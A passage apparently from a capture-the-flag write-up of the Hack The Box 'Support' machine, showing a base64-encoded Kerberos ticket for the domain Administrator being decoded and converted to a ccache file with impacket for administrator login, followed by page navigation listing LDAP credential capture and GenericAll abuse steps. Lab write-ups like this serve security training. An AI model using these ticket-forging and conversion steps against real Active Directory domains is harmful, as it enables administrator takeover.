OvZ1S4Y8g24LsN7081BnpsHjS/hlh4iHqgongbpQIerjQ+5NrjTsOsh2t9HwgzmA1i8FyIqO88T9Jm/FxL057FLiFPqeev2PaPtEcBhUg6dOZMSXAutIzs6c8POm9kV41/3pejGNcN8WkP2bciAasKzVy7JoO6tCCbMiQWUBuPIQpTnFYARxQ3aOQ0sw/xFIZRXE3k4lj+6UeYqbEq6kdCqkya89aWku3E9CqL682jPs7fLIJW+xN2oSgL9E7kldOtHpQ/v6zOQrkB6kGng/lrzSkX1U1rJwH2kOWi29D3FlXrlNlO7rP/4cajcyxX9SqVQlbXRWkYn6oAoTalVJsAeNNWknkldtNSyOdymqcZVXjvWJcSMYJYz0FbaUEPJ47TOSqNeDUIFT1HKK/SZHX+59CGOMspaYI+WGeHZUt+GQT5ku4PRjrlDVqs8/rgVwTT3F6r8sXVX1rrnYlAWbWn5UgVYPSCtEykj7DQadLRbKSLczhD3EzhmkhVK2vpN4eMxdIAa/aCoDWmgtxdIZBVTwSs3Hrxk2725SZ2YdsXNgUHewJyyZ7JDC7S2xUZbZZTg8hCEcADH/Fp5L/9pXUi/95V2mVicvwPdfsxWK9yUg5h8DDRg3GiSnUj7IDxKZPymZk9XyKNZPUOOk9q/n5pwlwjHi9phItGoShtpBJSiVx0fRCial2hHighzPofSFfpKlFTYQ1vzqaNv+QvFb2ggJsbDVasr8D2ZxM5FRPtABhIo2tLV9y5WXgsARsezJmRK3KRpLkA8EzU+CZoKPQ53WrJeK15Wdb8GobYcQDVg8w3FPGEfS0L3mANve43TPeBdAeT5TXNqC8Qx2cLceTtfo7hLAk04Ug2eIbJ/8kGjgdkwgdagAwIBAKKBzgSBy32ByDCBxaCBwjCBvzCBvKAbMBmgAwIBEaESBBD0OY3IT/I1R6bTdwhEhjkWoQ0bC1NVUFBPUlQuSFRCohowGKADAgEKoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKUAAKURGA8yMDI0MDUyMzA4MTc1M1qmERgPMjAyNDA1MjMxODE3NTNapxEYDzIwMjQwNTMwMDgxNzUzWqgNGwtTVVBQT1JULkhUQqkhMB+gAwIBAqEYMBYbBGNpZnMbDmRjLnN1cHBvcnQuaHRi

We will then convert it into a .ccache file to be used to login as the administrator user

$ echo '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' > ticket.kirbi.b64  
                                                                                                                                                                                                                  
$ base64 -d ticket.kirbi.b64 > ticket.kirbi
                                                                                                                                                                                                                  
$ impacket-ticketConverter ticket.kirbi ticket.ccache                
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done

PreviousActive NextSauna

Last updated 1 year ago

hashtagInitial Access

hashtagGuest Access to SMB Server

hashtagCapturing LDAP Simple Authentication Credentials

hashtagCredential hidden in LDAP field

hashtagPrivilege Escalation

hashtagAbusing GenericAll